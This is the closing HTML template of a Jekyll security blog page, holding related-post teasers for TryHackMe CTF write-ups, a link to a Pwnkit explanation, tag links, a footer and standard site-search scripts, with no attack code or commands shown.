  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/THM-Inclusion/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2021-12-23 00:00:00 +0800"
    >Dec 23, 2021</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>TryHackMe Inclusion Writeup</h3>
            <div class="text-muted small">
              <p>
                





                The TryHackMe inclusion room is a beginner CTF room created to practice exploiting a local file inclusion (LFI) vulnerability in a web server. Once you have booted up the machine, let’s get started...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/THM-Vulnerability-Capstone/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2021-12-27 00:00:00 +0800"
    >Dec 27, 2021</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>TryHackMe Vulnerability Capstone Writeup</h3>
            <div class="text-muted small">
              <p>
                





                The THM room Vulnerability Capstone is a CTF room built to practice your vulnerability and exploit researching skills.

Recon

Once the machine has started, we do a quick mandatory nmap scan to see...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/THM-Lazy-Admin-Walkthrough/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2022-01-07 00:00:00 +0800"
    >Jan  7</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>TryHackMe Lazy Admin Walkthrough</h3>
            <div class="text-muted small">
              <p>
                





                Lazy Admin is a an easy CTF room on TryHackMe that will test one’s enumeration and linux skills.

Recon

After deploying the machine, I did a mandatory nmap scan to see what ports are open and what...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


      
        
        <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/CVE-2021-4034-a.k.a.-Pwnkit-Explanation/" class="btn btn-outline-primary"
    prompt="Older">
    <p>Explanation of CVE-2021-4034 a.k.a. Pwnkit</p>
  </a>
  

  
  <span class="btn btn-outline-primary disabled"
    prompt="Newer">
    <p>-</p>
  </span>
  

</div>

      
        
        <!--  The comments switcher -->


      
    </div>
  </div>
</div> <!-- .row -->



        <!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://twitter.com/angry_byte">AngryByte</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        

        

        Powered by 
          <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
         with 
          <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>
         theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/tryhackme/">TryHackMe</a>
    
      
      <a class="post-tag" href="/tags/vulnerabilities/">Vulnerabilities</a>
    
      
      <a class="post-tag" href="/tags/linux/">Linux</a>
    
      
      <a class="post-tag" href="/tags/network-attacks/">Network-Attacks</a>
    
      
      <a class="post-tag" href="/tags/privilege-escalation/">Privilege-Escalation</a>
    
      
      <a class="post-tag" href="/tags/sqli/">SQLi</a>
    
      
      <a class="post-tag" href="/tags/web-attacks/">Web-Attacks</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup -->
  <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>





<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>



    
    <!-- Include LightBox -->
    <div>
        <script type="text/javascript" src="/assets/js/lightbox.js"></script>
        <link rel="stylesheet" href="/assets/css/lightbox.css">
    </div>
  </body>

</html>

